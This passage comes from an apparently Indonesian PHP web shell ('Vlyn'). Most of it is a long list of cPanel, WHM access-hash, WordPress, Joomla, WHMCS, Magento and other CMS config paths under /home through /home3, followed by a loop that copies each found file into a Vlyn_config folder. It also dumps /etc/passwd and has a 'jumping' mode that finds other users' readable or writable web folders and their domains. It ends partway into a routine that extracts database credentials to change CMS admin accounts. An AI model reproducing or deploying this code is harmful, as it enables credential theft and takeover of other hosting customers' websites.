  2670. "/home/$user_Vlyn/public_html/home/wp-config.php" => "WordPressHome",
  2671. "/home/$user_Vlyn/public_html/NEW/wp-config.php" => "WordPressNew",
  2672. "/home/$user_Vlyn/public_html/New/wp-config.php" => "WordPressNew",
  2673. "/home/$user_Vlyn/public_html/new/wp-config.php" => "WordPressNew",
  2674. "/home/$user_Vlyn/public_html/News/wp-config.php" => "WordPressNews",
  2675. "/home/$user_Vlyn/public_html/NEWS/wp-config.php" => "WordPressNews",
  2676. "/home/$user_Vlyn/public_html/news/wp-config.php" => "WordPressNews",
  2677. "/home/$user_Vlyn/public_html/Cms/wp-config.php" => "WordPressCms",
  2678. "/home/$user_Vlyn/public_html/CMS/wp-config.php" => "WordPressCms",
  2679. "/home/$user_Vlyn/public_html/cms/wp-config.php" => "WordPressCms",
  2680. "/home/$user_Vlyn/public_html/Main/wp-config.php" => "WordPressMain",
  2681. "/home/$user_Vlyn/public_html/MAIN/wp-config.php" => "WordPressMain",
  2682. "/home/$user_Vlyn/public_html/main/wp-config.php" => "WordPressMain",
  2683. "/home/$user_Vlyn/public_html/Blog/wp-config.php" => "WordPressBlog",
  2684. "/home/$user_Vlyn/public_html/BLOG/wp-config.php" => "WordPressBlog",
  2685. "/home/$user_Vlyn/public_html/blog/wp-config.php" => "WordPressBlog",
  2686. "/home/$user_Vlyn/public_html/Blogs/wp-config.php" => "WordPressBlogs",
  2687. "/home/$user_Vlyn/public_html/BLOGS/wp-config.php" => "WordPressBlogs",
  2688. "/home/$user_Vlyn/public_html/blogs/wp-config.php" => "WordPressBlogs",
  2689. "/home/$user_Vlyn/public_html/beta/wp-config.php" => "WordPressBeta",
  2690. "/home/$user_Vlyn/public_html/Beta/wp-config.php" => "WordPressBeta",
  2691. "/home/$user_Vlyn/public_html/BETA/wp-config.php" => "WordPressBeta",
  2692. "/home/$user_Vlyn/public_html/PRESS/wp-config.php" => "WordPressPress",
  2693. "/home/$user_Vlyn/public_html/Press/wp-config.php" => "WordPressPress",
  2694. "/home/$user_Vlyn/public_html/press/wp-config.php" => "WordPressPress",
  2695. "/home/$user_Vlyn/public_html/Wp/wp-config.php" => "WordPressWp",
  2696. "/home/$user_Vlyn/public_html/wp/wp-config.php" => "WordPressWp",
  2697. "/home/$user_Vlyn/public_html/WP/wp-config.php" => "WordPressWP",
  2698. "/home/$user_Vlyn/public_html/portal/wp-config.php" => "WordPressPortal",
  2699. "/home/$user_Vlyn/public_html/PORTAL/wp-config.php" => "WordPressPortal",
  2700. "/home/$user_Vlyn/public_html/Portal/wp-config.php" => "WordPressPortal",
  2701. "/home1/$user_Vlyn/.my.cnf" => "cpanel",
  2702. "/home1/$user_Vlyn/.accesshash" => "WHM-accesshash",
  2703. "/home1/$user_Vlyn/public_html/bw-configs/config.ini" => "BosWeb",
  2704. "/home1/$user_Vlyn/public_html/config/koneksi.php" => "Lokomedia",
  2705. "/home1/$user_Vlyn/public_html/lokomedia/config/koneksi.php" => "Lokomedia",
  2706. "/home1/$user_Vlyn/public_html/clientarea/configuration.php" => "WHMCS",
  2707. "/home1/$user_Vlyn/public_html/whmcs/configuration.php" => "WHMCS",
  2708. "/home1/$user_Vlyn/public_html/forum/config.php" => "phpBB",
  2709. "/home1/$user_Vlyn/public_html/sites/default/settings.php" => "Drupal",
  2710. "/home1/$user_Vlyn/public_html/config/settings.inc.php" => "PrestaShop",
  2711. "/home1/$user_Vlyn/public_html/app/etc/local.xml" => "Magento",
  2712. "/home1/$user_Vlyn/public_html/admin/config.php" => "OpenCart",
  2713. "/home1/$user_Vlyn/public_html/slconfig.php" => "Sitelok",
  2714. "/home1/$user_Vlyn/public_html/application/config/database.php" => "Ellislab",
  2715. "/home1/$user_Vlyn/public_html/whm/configuration.php" => "WHMCS",
  2716. "/home1/$user_Vlyn/public_html/whmc/WHM/configuration.ph" => "WHMC",
  2717. "/home1/$user_Vlyn/public_html/central/configuration.php" => "WHM Central",
  2718. "/home1/$user_Vlyn/public_html/whm/WHMCS/configuration.php" => "WHMCS",
  2719. "/home1/$user_Vlyn/public_html/whm/whmcs/configuration.php" => "WHMCS",
  2720. "/home1/$user_Vlyn/public_html/submitticket.php" => "WHMCS",
  2721. "/home1/$user_Vlyn/public_html/configuration.php" => "Joomla",
  2722. "/home1/$user_Vlyn/public_html/Joomla/configuration.php" => "JoomlaJoomla",
  2723. "/home1/$user_Vlyn/public_html/joomla/configuration.php" => "JoomlaJoomla",
  2724. "/home1/$user_Vlyn/public_html/JOOMLA/configuration.php" => "JoomlaJoomla",
  2725. "/home1/$user_Vlyn/public_html/Home/configuration.php" => "JoomlaHome",
  2726. "/home1/$user_Vlyn/public_html/HOME/configuration.php" => "JoomlaHome",
  2727. "/home1/$user_Vlyn/public_html/home/configuration.php" => "JoomlaHome",
  2728. "/home1/$user_Vlyn/public_html/NEW/configuration.php" => "JoomlaNew",
  2729. "/home1/$user_Vlyn/public_html/New/configuration.php" => "JoomlaNew",
  2730. "/home1/$user_Vlyn/public_html/new/configuration.php" => "JoomlaNew",
  2731. "/home1/$user_Vlyn/public_html/News/configuration.php" => "JoomlaNews",
  2732. "/home1/$user_Vlyn/public_html/NEWS/configuration.php" => "JoomlaNews",
  2733. "/home1/$user_Vlyn/public_html/news/configuration.php" => "JoomlaNews",
  2734. "/home1/$user_Vlyn/public_html/Cms/configuration.php" => "JoomlaCms",
  2735. "/home1/$user_Vlyn/public_html/CMS/configuration.php" => "JoomlaCms",
  2736. "/home1/$user_Vlyn/public_html/cms/configuration.php" => "JoomlaCms",
  2737. "/home1/$user_Vlyn/public_html/Main/configuration.php" => "JoomlaMain",
  2738. "/home1/$user_Vlyn/public_html/MAIN/configuration.php" => "JoomlaMain",
  2739. "/home1/$user_Vlyn/public_html/main/configuration.php" => "JoomlaMain",
  2740. "/home1/$user_Vlyn/public_html/Blog/configuration.php" => "JoomlaBlog",
  2741. "/home1/$user_Vlyn/public_html/BLOG/configuration.php" => "JoomlaBlog",
  2742. "/home1/$user_Vlyn/public_html/blog/configuration.php" => "JoomlaBlog",
  2743. "/home1/$user_Vlyn/public_html/Blogs/configuration.php" => "JoomlaBlogs",
  2744. "/home1/$user_Vlyn/public_html/BLOGS/configuration.php" => "JoomlaBlogs",
  2745. "/home1/$user_Vlyn/public_html/blogs/configuration.php" => "JoomlaBlogs",
  2746. "/home1/$user_Vlyn/public_html/beta/configuration.php" => "JoomlaBeta",
  2747. "/home1/$user_Vlyn/public_html/Beta/configuration.php" => "JoomlaBeta",
  2748. "/home1/$user_Vlyn/public_html/BETA/configuration.php" => "JoomlaBeta",
  2749. "/home1/$user_Vlyn/public_html/PRESS/configuration.php" => "JoomlaPress",
  2750. "/home1/$user_Vlyn/public_html/Press/configuration.php" => "JoomlaPress",
  2751. "/home1/$user_Vlyn/public_html/press/configuration.php" => "JoomlaPress",
  2752. "/home1/$user_Vlyn/public_html/Wp/configuration.php" => "JoomlaWp",
  2753. "/home1/$user_Vlyn/public_html/wp/configuration.php" => "JoomlaWp",
  2754. "/home1/$user_Vlyn/public_html/WP/configuration.php" => "JoomlaWP",
  2755. "/home1/$user_Vlyn/public_html/portal/configuration.php" => "JoomlaPortal",
  2756. "/home1/$user_Vlyn/public_html/PORTAL/configuration.php" => "JoomlaPortal",
  2757. "/home1/$user_Vlyn/public_html/Portal/configuration.php" => "JoomlaPortal",
  2758. "/home1/$user_Vlyn/public_html/wp-config.php" => "WordPress",
  2759. "/home1/$user_Vlyn/public_html/wordpress/wp-config.php" => "WordPressWordpress",
  2760. "/home1/$user_Vlyn/public_html/Wordpress/wp-config.php" => "WordPressWordpress",
  2761. "/home1/$user_Vlyn/public_html/WORDPRESS/wp-config.php" => "WordPressWordpress",
  2762. "/home1/$user_Vlyn/public_html/Home/wp-config.php" => "WordPressHome",
  2763. "/home1/$user_Vlyn/public_html/HOME/wp-config.php" => "WordPressHome",
  2764. "/home1/$user_Vlyn/public_html/home/wp-config.php" => "WordPressHome",
  2765. "/home1/$user_Vlyn/public_html/NEW/wp-config.php" => "WordPressNew",
  2766. "/home1/$user_Vlyn/public_html/New/wp-config.php" => "WordPressNew",
  2767. "/home1/$user_Vlyn/public_html/new/wp-config.php" => "WordPressNew",
  2768. "/home1/$user_Vlyn/public_html/News/wp-config.php" => "WordPressNews",
  2769. "/home1/$user_Vlyn/public_html/NEWS/wp-config.php" => "WordPressNews",
  2770. "/home1/$user_Vlyn/public_html/news/wp-config.php" => "WordPressNews",
  2771. "/home1/$user_Vlyn/public_html/Cms/wp-config.php" => "WordPressCms",
  2772. "/home1/$user_Vlyn/public_html/CMS/wp-config.php" => "WordPressCms",
  2773. "/home1/$user_Vlyn/public_html/cms/wp-config.php" => "WordPressCms",
  2774. "/home1/$user_Vlyn/public_html/Main/wp-config.php" => "WordPressMain",
  2775. "/home1/$user_Vlyn/public_html/MAIN/wp-config.php" => "WordPressMain",
  2776. "/home1/$user_Vlyn/public_html/main/wp-config.php" => "WordPressMain",
  2777. "/home1/$user_Vlyn/public_html/Blog/wp-config.php" => "WordPressBlog",
  2778. "/home1/$user_Vlyn/public_html/BLOG/wp-config.php" => "WordPressBlog",
  2779. "/home1/$user_Vlyn/public_html/blog/wp-config.php" => "WordPressBlog",
  2780. "/home1/$user_Vlyn/public_html/Blogs/wp-config.php" => "WordPressBlogs",
  2781. "/home1/$user_Vlyn/public_html/BLOGS/wp-config.php" => "WordPressBlogs",
  2782. "/home1/$user_Vlyn/public_html/blogs/wp-config.php" => "WordPressBlogs",
  2783. "/home1/$user_Vlyn/public_html/beta/wp-config.php" => "WordPressBeta",
  2784. "/home1/$user_Vlyn/public_html/Beta/wp-config.php" => "WordPressBeta",
  2785. "/home1/$user_Vlyn/public_html/BETA/wp-config.php" => "WordPressBeta",
  2786. "/home1/$user_Vlyn/public_html/PRESS/wp-config.php" => "WordPressPress",
  2787. "/home1/$user_Vlyn/public_html/Press/wp-config.php" => "WordPressPress",
  2788. "/home1/$user_Vlyn/public_html/press/wp-config.php" => "WordPressPress",
  2789. "/home1/$user_Vlyn/public_html/Wp/wp-config.php" => "WordPressWp",
  2790. "/home1/$user_Vlyn/public_html/wp/wp-config.php" => "WordPressWp",
  2791. "/home1/$user_Vlyn/public_html/WP/wp-config.php" => "WordPressWP",
  2792. "/home1/$user_Vlyn/public_html/portal/wp-config.php" => "WordPressPortal",
  2793. "/home1/$user_Vlyn/public_html/PORTAL/wp-config.php" => "WordPressPortal",
  2794. "/home1/$user_Vlyn/public_html/Portal/wp-config.php" => "WordPressPortal",
  2795. "/home2/$user_Vlyn/.my.cnf" => "cpanel",
  2796. "/home2/$user_Vlyn/.accesshash" => "WHM-accesshash",
  2797. "/home2/$user_Vlyn/public_html/bw-configs/config.ini" => "BosWeb",
  2798. "/home2/$user_Vlyn/public_html/config/koneksi.php" => "Lokomedia",
  2799. "/home2/$user_Vlyn/public_html/lokomedia/config/koneksi.php" => "Lokomedia",
  2800. "/home2/$user_Vlyn/public_html/clientarea/configuration.php" => "WHMCS",
  2801. "/home2/$user_Vlyn/public_html/whmcs/configuration.php" => "WHMCS",
  2802. "/home2/$user_Vlyn/public_html/forum/config.php" => "phpBB",
  2803. "/home2/$user_Vlyn/public_html/sites/default/settings.php" => "Drupal",
  2804. "/home2/$user_Vlyn/public_html/config/settings.inc.php" => "PrestaShop",
  2805. "/home2/$user_Vlyn/public_html/app/etc/local.xml" => "Magento",
  2806. "/home2/$user_Vlyn/public_html/admin/config.php" => "OpenCart",
  2807. "/home2/$user_Vlyn/public_html/slconfig.php" => "Sitelok",
  2808. "/home2/$user_Vlyn/public_html/application/config/database.php" => "Ellislab",
  2809. "/home2/$user_Vlyn/public_html/whm/configuration.php" => "WHMCS",
  2810. "/home2/$user_Vlyn/public_html/whmc/WHM/configuration.ph" => "WHMC",
  2811. "/home2/$user_Vlyn/public_html/central/configuration.php" => "WHM Central",
  2812. "/home2/$user_Vlyn/public_html/whm/WHMCS/configuration.php" => "WHMCS",
  2813. "/home2/$user_Vlyn/public_html/whm/whmcs/configuration.php" => "WHMCS",
  2814. "/home2/$user_Vlyn/public_html/submitticket.php" => "WHMCS",
  2815. "/home2/$user_Vlyn/public_html/configuration.php" => "Joomla",
  2816. "/home2/$user_Vlyn/public_html/Joomla/configuration.php" => "JoomlaJoomla",
  2817. "/home2/$user_Vlyn/public_html/joomla/configuration.php" => "JoomlaJoomla",
  2818. "/home2/$user_Vlyn/public_html/JOOMLA/configuration.php" => "JoomlaJoomla",
  2819. "/home2/$user_Vlyn/public_html/Home/configuration.php" => "JoomlaHome",
  2820. "/home2/$user_Vlyn/public_html/HOME/configuration.php" => "JoomlaHome",
  2821. "/home2/$user_Vlyn/public_html/home/configuration.php" => "JoomlaHome",
  2822. "/home2/$user_Vlyn/public_html/NEW/configuration.php" => "JoomlaNew",
  2823. "/home2/$user_Vlyn/public_html/New/configuration.php" => "JoomlaNew",
  2824. "/home2/$user_Vlyn/public_html/new/configuration.php" => "JoomlaNew",
  2825. "/home2/$user_Vlyn/public_html/News/configuration.php" => "JoomlaNews",
  2826. "/home2/$user_Vlyn/public_html/NEWS/configuration.php" => "JoomlaNews",
  2827. "/home2/$user_Vlyn/public_html/news/configuration.php" => "JoomlaNews",
  2828. "/home2/$user_Vlyn/public_html/Cms/configuration.php" => "JoomlaCms",
  2829. "/home2/$user_Vlyn/public_html/CMS/configuration.php" => "JoomlaCms",
  2830. "/home2/$user_Vlyn/public_html/cms/configuration.php" => "JoomlaCms",
  2831. "/home2/$user_Vlyn/public_html/Main/configuration.php" => "JoomlaMain",
  2832. "/home2/$user_Vlyn/public_html/MAIN/configuration.php" => "JoomlaMain",
  2833. "/home2/$user_Vlyn/public_html/main/configuration.php" => "JoomlaMain",
  2834. "/home2/$user_Vlyn/public_html/Blog/configuration.php" => "JoomlaBlog",
  2835. "/home2/$user_Vlyn/public_html/BLOG/configuration.php" => "JoomlaBlog",
  2836. "/home2/$user_Vlyn/public_html/blog/configuration.php" => "JoomlaBlog",
  2837. "/home2/$user_Vlyn/public_html/Blogs/configuration.php" => "JoomlaBlogs",
  2838. "/home2/$user_Vlyn/public_html/BLOGS/configuration.php" => "JoomlaBlogs",
  2839. "/home2/$user_Vlyn/public_html/blogs/configuration.php" => "JoomlaBlogs",
  2840. "/home2/$user_Vlyn/public_html/beta/configuration.php" => "JoomlaBeta",
  2841. "/home2/$user_Vlyn/public_html/Beta/configuration.php" => "JoomlaBeta",
  2842. "/home2/$user_Vlyn/public_html/BETA/configuration.php" => "JoomlaBeta",
  2843. "/home2/$user_Vlyn/public_html/PRESS/configuration.php" => "JoomlaPress",
  2844. "/home2/$user_Vlyn/public_html/Press/configuration.php" => "JoomlaPress",
  2845. "/home2/$user_Vlyn/public_html/press/configuration.php" => "JoomlaPress",
  2846. "/home2/$user_Vlyn/public_html/Wp/configuration.php" => "JoomlaWp",
  2847. "/home2/$user_Vlyn/public_html/wp/configuration.php" => "JoomlaWp",
  2848. "/home2/$user_Vlyn/public_html/WP/configuration.php" => "JoomlaWP",
  2849. "/home2/$user_Vlyn/public_html/portal/configuration.php" => "JoomlaPortal",
  2850. "/home2/$user_Vlyn/public_html/PORTAL/configuration.php" => "JoomlaPortal",
  2851. "/home2/$user_Vlyn/public_html/Portal/configuration.php" => "JoomlaPortal",
  2852. "/home2/$user_Vlyn/public_html/wp-config.php" => "WordPress",
  2853. "/home2/$user_Vlyn/public_html/wordpress/wp-config.php" => "WordPressWordpress",
  2854. "/home2/$user_Vlyn/public_html/Wordpress/wp-config.php" => "WordPressWordpress",
  2855. "/home2/$user_Vlyn/public_html/WORDPRESS/wp-config.php" => "WordPressWordpress",
  2856. "/home2/$user_Vlyn/public_html/Home/wp-config.php" => "WordPressHome",
  2857. "/home2/$user_Vlyn/public_html/HOME/wp-config.php" => "WordPressHome",
  2858. "/home2/$user_Vlyn/public_html/home/wp-config.php" => "WordPressHome",
  2859. "/home2/$user_Vlyn/public_html/NEW/wp-config.php" => "WordPressNew",
  2860. "/home2/$user_Vlyn/public_html/New/wp-config.php" => "WordPressNew",
  2861. "/home2/$user_Vlyn/public_html/new/wp-config.php" => "WordPressNew",
  2862. "/home2/$user_Vlyn/public_html/News/wp-config.php" => "WordPressNews",
  2863. "/home2/$user_Vlyn/public_html/NEWS/wp-config.php" => "WordPressNews",
  2864. "/home2/$user_Vlyn/public_html/news/wp-config.php" => "WordPressNews",
  2865. "/home2/$user_Vlyn/public_html/Cms/wp-config.php" => "WordPressCms",
  2866. "/home2/$user_Vlyn/public_html/CMS/wp-config.php" => "WordPressCms",
  2867. "/home2/$user_Vlyn/public_html/cms/wp-config.php" => "WordPressCms",
  2868. "/home2/$user_Vlyn/public_html/Main/wp-config.php" => "WordPressMain",
  2869. "/home2/$user_Vlyn/public_html/MAIN/wp-config.php" => "WordPressMain",
  2870. "/home2/$user_Vlyn/public_html/main/wp-config.php" => "WordPressMain",
  2871. "/home2/$user_Vlyn/public_html/Blog/wp-config.php" => "WordPressBlog",
  2872. "/home2/$user_Vlyn/public_html/BLOG/wp-config.php" => "WordPressBlog",
  2873. "/home2/$user_Vlyn/public_html/blog/wp-config.php" => "WordPressBlog",
  2874. "/home2/$user_Vlyn/public_html/Blogs/wp-config.php" => "WordPressBlogs",
  2875. "/home2/$user_Vlyn/public_html/BLOGS/wp-config.php" => "WordPressBlogs",
  2876. "/home2/$user_Vlyn/public_html/blogs/wp-config.php" => "WordPressBlogs",
  2877. "/home2/$user_Vlyn/public_html/beta/wp-config.php" => "WordPressBeta",
  2878. "/home2/$user_Vlyn/public_html/Beta/wp-config.php" => "WordPressBeta",
  2879. "/home2/$user_Vlyn/public_html/BETA/wp-config.php" => "WordPressBeta",
  2880. "/home2/$user_Vlyn/public_html/PRESS/wp-config.php" => "WordPressPress",
  2881. "/home2/$user_Vlyn/public_html/Press/wp-config.php" => "WordPressPress",
  2882. "/home2/$user_Vlyn/public_html/press/wp-config.php" => "WordPressPress",
  2883. "/home2/$user_Vlyn/public_html/Wp/wp-config.php" => "WordPressWp",
  2884. "/home2/$user_Vlyn/public_html/wp/wp-config.php" => "WordPressWp",
  2885. "/home2/$user_Vlyn/public_html/WP/wp-config.php" => "WordPressWP",
  2886. "/home2/$user_Vlyn/public_html/portal/wp-config.php" => "WordPressPortal",
  2887. "/home2/$user_Vlyn/public_html/PORTAL/wp-config.php" => "WordPressPortal",
  2888. "/home2/$user_Vlyn/public_html/Portal/wp-config.php" => "WordPressPortal",
  2889. "/home3/$user_Vlyn/.my.cnf" => "cpanel",
  2890. "/home3/$user_Vlyn/.accesshash" => "WHM-accesshash",
  2891. "/home3/$user_Vlyn/public_html/bw-configs/config.ini" => "BosWeb",
  2892. "/home3/$user_Vlyn/public_html/config/koneksi.php" => "Lokomedia",
  2893. "/home3/$user_Vlyn/public_html/lokomedia/config/koneksi.php" => "Lokomedia",
  2894. "/home3/$user_Vlyn/public_html/clientarea/configuration.php" => "WHMCS",
  2895. "/home3/$user_Vlyn/public_html/whmcs/configuration.php" => "WHMCS",
  2896. "/home3/$user_Vlyn/public_html/forum/config.php" => "phpBB",
  2897. "/home3/$user_Vlyn/public_html/sites/default/settings.php" => "Drupal",
  2898. "/home3/$user_Vlyn/public_html/config/settings.inc.php" => "PrestaShop",
  2899. "/home3/$user_Vlyn/public_html/app/etc/local.xml" => "Magento",
  2900. "/home3/$user_Vlyn/public_html/admin/config.php" => "OpenCart",
  2901. "/home3/$user_Vlyn/public_html/slconfig.php" => "Sitelok",
  2902. "/home3/$user_Vlyn/public_html/application/config/database.php" => "Ellislab",
  2903. "/home3/$user_Vlyn/public_html/whm/configuration.php" => "WHMCS",
  2904. "/home3/$user_Vlyn/public_html/whmc/WHM/configuration.ph" => "WHMC",
  2905. "/home3/$user_Vlyn/public_html/central/configuration.php" => "WHM Central",
  2906. "/home3/$user_Vlyn/public_html/whm/WHMCS/configuration.php" => "WHMCS",
  2907. "/home3/$user_Vlyn/public_html/whm/whmcs/configuration.php" => "WHMCS",
  2908. "/home3/$user_Vlyn/public_html/submitticket.php" => "WHMCS",
  2909. "/home3/$user_Vlyn/public_html/configuration.php" => "Joomla",
  2910. "/home3/$user_Vlyn/public_html/Joomla/configuration.php" => "JoomlaJoomla",
  2911. "/home3/$user_Vlyn/public_html/joomla/configuration.php" => "JoomlaJoomla",
  2912. "/home3/$user_Vlyn/public_html/JOOMLA/configuration.php" => "JoomlaJoomla",
  2913. "/home3/$user_Vlyn/public_html/Home/configuration.php" => "JoomlaHome",
  2914. "/home3/$user_Vlyn/public_html/HOME/configuration.php" => "JoomlaHome",
  2915. "/home3/$user_Vlyn/public_html/home/configuration.php" => "JoomlaHome",
  2916. "/home3/$user_Vlyn/public_html/NEW/configuration.php" => "JoomlaNew",
  2917. "/home3/$user_Vlyn/public_html/New/configuration.php" => "JoomlaNew",
  2918. "/home3/$user_Vlyn/public_html/new/configuration.php" => "JoomlaNew",
  2919. "/home3/$user_Vlyn/public_html/News/configuration.php" => "JoomlaNews",
  2920. "/home3/$user_Vlyn/public_html/NEWS/configuration.php" => "JoomlaNews",
  2921. "/home3/$user_Vlyn/public_html/news/configuration.php" => "JoomlaNews",
  2922. "/home3/$user_Vlyn/public_html/Cms/configuration.php" => "JoomlaCms",
  2923. "/home3/$user_Vlyn/public_html/CMS/configuration.php" => "JoomlaCms",
  2924. "/home3/$user_Vlyn/public_html/cms/configuration.php" => "JoomlaCms",
  2925. "/home3/$user_Vlyn/public_html/Main/configuration.php" => "JoomlaMain",
  2926. "/home3/$user_Vlyn/public_html/MAIN/configuration.php" => "JoomlaMain",
  2927. "/home3/$user_Vlyn/public_html/main/configuration.php" => "JoomlaMain",
  2928. "/home3/$user_Vlyn/public_html/Blog/configuration.php" => "JoomlaBlog",
  2929. "/home3/$user_Vlyn/public_html/BLOG/configuration.php" => "JoomlaBlog",
  2930. "/home3/$user_Vlyn/public_html/blog/configuration.php" => "JoomlaBlog",
  2931. "/home3/$user_Vlyn/public_html/Blogs/configuration.php" => "JoomlaBlogs",
  2932. "/home3/$user_Vlyn/public_html/BLOGS/configuration.php" => "JoomlaBlogs",
  2933. "/home3/$user_Vlyn/public_html/blogs/configuration.php" => "JoomlaBlogs",
  2934. "/home3/$user_Vlyn/public_html/beta/configuration.php" => "JoomlaBeta",
  2935. "/home3/$user_Vlyn/public_html/Beta/configuration.php" => "JoomlaBeta",
  2936. "/home3/$user_Vlyn/public_html/BETA/configuration.php" => "JoomlaBeta",
  2937. "/home3/$user_Vlyn/public_html/PRESS/configuration.php" => "JoomlaPress",
  2938. "/home3/$user_Vlyn/public_html/Press/configuration.php" => "JoomlaPress",
  2939. "/home3/$user_Vlyn/public_html/press/configuration.php" => "JoomlaPress",
  2940. "/home3/$user_Vlyn/public_html/Wp/configuration.php" => "JoomlaWp",
  2941. "/home3/$user_Vlyn/public_html/wp/configuration.php" => "JoomlaWp",
  2942. "/home3/$user_Vlyn/public_html/WP/configuration.php" => "JoomlaWP",
  2943. "/home3/$user_Vlyn/public_html/portal/configuration.php" => "JoomlaPortal",
  2944. "/home3/$user_Vlyn/public_html/PORTAL/configuration.php" => "JoomlaPortal",
  2945. "/home3/$user_Vlyn/public_html/Portal/configuration.php" => "JoomlaPortal",
  2946. "/home3/$user_Vlyn/public_html/wp-config.php" => "WordPress",
  2947. "/home3/$user_Vlyn/public_html/wordpress/wp-config.php" => "WordPressWordpress",
  2948. "/home3/$user_Vlyn/public_html/Wordpress/wp-config.php" => "WordPressWordpress",
  2949. "/home3/$user_Vlyn/public_html/WORDPRESS/wp-config.php" => "WordPressWordpress",
  2950. "/home3/$user_Vlyn/public_html/Home/wp-config.php" => "WordPressHome",
  2951. "/home3/$user_Vlyn/public_html/HOME/wp-config.php" => "WordPressHome",
  2952. "/home3/$user_Vlyn/public_html/home/wp-config.php" => "WordPressHome",
  2953. "/home3/$user_Vlyn/public_html/NEW/wp-config.php" => "WordPressNew",
  2954. "/home3/$user_Vlyn/public_html/New/wp-config.php" => "WordPressNew",
  2955. "/home3/$user_Vlyn/public_html/new/wp-config.php" => "WordPressNew",
  2956. "/home3/$user_Vlyn/public_html/News/wp-config.php" => "WordPressNews",
  2957. "/home3/$user_Vlyn/public_html/NEWS/wp-config.php" => "WordPressNews",
  2958. "/home3/$user_Vlyn/public_html/news/wp-config.php" => "WordPressNews",
  2959. "/home3/$user_Vlyn/public_html/Cms/wp-config.php" => "WordPressCms",
  2960. "/home3/$user_Vlyn/public_html/CMS/wp-config.php" => "WordPressCms",
  2961. "/home3/$user_Vlyn/public_html/cms/wp-config.php" => "WordPressCms",
  2962. "/home3/$user_Vlyn/public_html/Main/wp-config.php" => "WordPressMain",
  2963. "/home3/$user_Vlyn/public_html/MAIN/wp-config.php" => "WordPressMain",
  2964. "/home3/$user_Vlyn/public_html/main/wp-config.php" => "WordPressMain",
  2965. "/home3/$user_Vlyn/public_html/Blog/wp-config.php" => "WordPressBlog",
  2966. "/home3/$user_Vlyn/public_html/BLOG/wp-config.php" => "WordPressBlog",
  2967. "/home3/$user_Vlyn/public_html/blog/wp-config.php" => "WordPressBlog",
  2968. "/home3/$user_Vlyn/public_html/Blogs/wp-config.php" => "WordPressBlogs",
  2969. "/home3/$user_Vlyn/public_html/BLOGS/wp-config.php" => "WordPressBlogs",
  2970. "/home3/$user_Vlyn/public_html/blogs/wp-config.php" => "WordPressBlogs",
  2971. "/home3/$user_Vlyn/public_html/beta/wp-config.php" => "WordPressBeta",
  2972. "/home3/$user_Vlyn/public_html/Beta/wp-config.php" => "WordPressBeta",
  2973. "/home3/$user_Vlyn/public_html/BETA/wp-config.php" => "WordPressBeta",
  2974. "/home3/$user_Vlyn/public_html/PRESS/wp-config.php" => "WordPressPress",
  2975. "/home3/$user_Vlyn/public_html/Press/wp-config.php" => "WordPressPress",
  2976. "/home3/$user_Vlyn/public_html/press/wp-config.php" => "WordPressPress",
  2977. "/home3/$user_Vlyn/public_html/Wp/wp-config.php" => "WordPressWp",
  2978. "/home3/$user_Vlyn/public_html/wp/wp-config.php" => "WordPressWp",
  2979. "/home3/$user_Vlyn/public_html/WP/wp-config.php" => "WordPressWP",
  2980. "/home3/$user_Vlyn/public_html/portal/wp-config.php" => "WordPressPortal",
  2981. "/home3/$user_Vlyn/public_html/PORTAL/wp-config.php" => "WordPressPortal",
  2982. "/home3/$user_Vlyn/public_html/Portal/wp-config.php" => "WordPressPortal"
  2983. );
  2984. foreach($grab_config as $config => $nama_config) {
  2985. $ambil_config = file_get_contents($config);
  2986. if($ambil_config == '') {
  2987. } else {
  2988. $file_config = fopen("Vlyn_config/$user_Vlyn-$nama_config.txt","w");
  2989. fputs($file_config,$ambil_config);
  2990. }
  2991. }
  2992. }
  2993. }
  2994. echo "<center><a href='?dir=$dir/Vlyn_config'><font color=blue>Done</font></a></center>";
  2995. }else{
  2996.  
  2997. echo "<form method=\"post\" action=\"\"><center>etc/passw ( Error ? <a href='?dir=$dir&do=passwbypass'>Bypass Here</a> )<br><textarea name=\"passwd\" class='area' rows='15' cols='60'>\n";
  2998. echo file_get_contents('/etc/passwd');
  2999. echo "</textarea><br><input type=\"submit\" value=\"GassPoll\"></td></tr></center>\n";
  3000. }
  3001. } elseif($_GET['do'] == 'jumping') {
  3002. $i = 0;
  3003. echo "<pre><div class='margin: 5px auto;'>";
  3004. $etc = fopen("/etc/passwd", "r");
  3005. while($passwd = fgets($etc)) {
  3006. if($passwd == '' || !$etc) {
  3007. echo "<font color=red>Can't read /etc/passwd</font>";
  3008. } else {
  3009. preg_match_all('/(.*?):x:/', $passwd, $user_jumping);
  3010. foreach($user_jumping[1] as $user_Vlyn_jump) {
  3011. $user_jumping_dir = "/home/$user_Vlyn_jump/public_html";
  3012. if(is_readable($user_jumping_dir)) {
  3013. $i++;
  3014. $jrw = "[<font color=blue>R</font>] <a href='?dir=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a><br>";
  3015. if(is_writable($user_jumping_dir)) {
  3016. $jrw = "[<font color=blue>RW</font>] <a href='?dir=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a><br>";
  3017. }
  3018. echo $jrw;
  3019. $domain_jump = file_get_contents("/etc/named.conf");
  3020. if($domain_jump == '') {
  3021. echo " => ( <font color=red>gabisa ambil nama domain nya</font> )<br>";
  3022. } else {
  3023. preg_match_all("#/var/named/(.*?).db#", $domain_jump, $domains_jump);
  3024. foreach($domains_jump[1] as $dj) {
  3025. $user_jumping_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
  3026. $user_jumping_url = $user_jumping_url['name'];
  3027. if($user_jumping_url == $user_Vlyn_jump) {
  3028. echo " => ( <u>$dj</u> )<br>";
  3029. break;
  3030. }
  3031. }
  3032. }
  3033. }
  3034. }
  3035. }
  3036. }
  3037. if($i == 0) {
  3038. } else {
  3039. echo "<br>Total ada ".$i." Kimcil di ".gethostbyname($_SERVER['HTTP_HOST'])."";
  3040. }
  3041. echo "</div></pre>";
  3042. } elseif($_GET['do'] == 'auto_edit_user') {
  3043. if($_POST['hajar']) {
  3044. if(strlen($_POST['pass_baru']) < 6 OR strlen($_POST['user_baru']) < 6) {
  3045. echo "username atau password harus lebih dari 6 karakter";
  3046. } else {
  3047. $user_baru = $_POST['user_baru'];
  3048. $pass_baru = md5($_POST['pass_baru']);
  3049. $conf = $_POST['config_dir'];
  3050. $scan_conf = scandir($conf);
  3051. foreach($scan_conf as $file_conf) {
  3052. if(!is_file("$conf/$file_conf")) continue;
  3053. $config = file_get_contents("$conf/$file_conf");
  3054. if(preg_match("/JConfig|joomla/",$config)) {
  3055. $dbhost = ambilkata($config,"host = '","'");
  3056. $dbuser = ambilkata($config,"user = '","'");
  3057. $dbpass = ambilkata($config,"password = '","'");
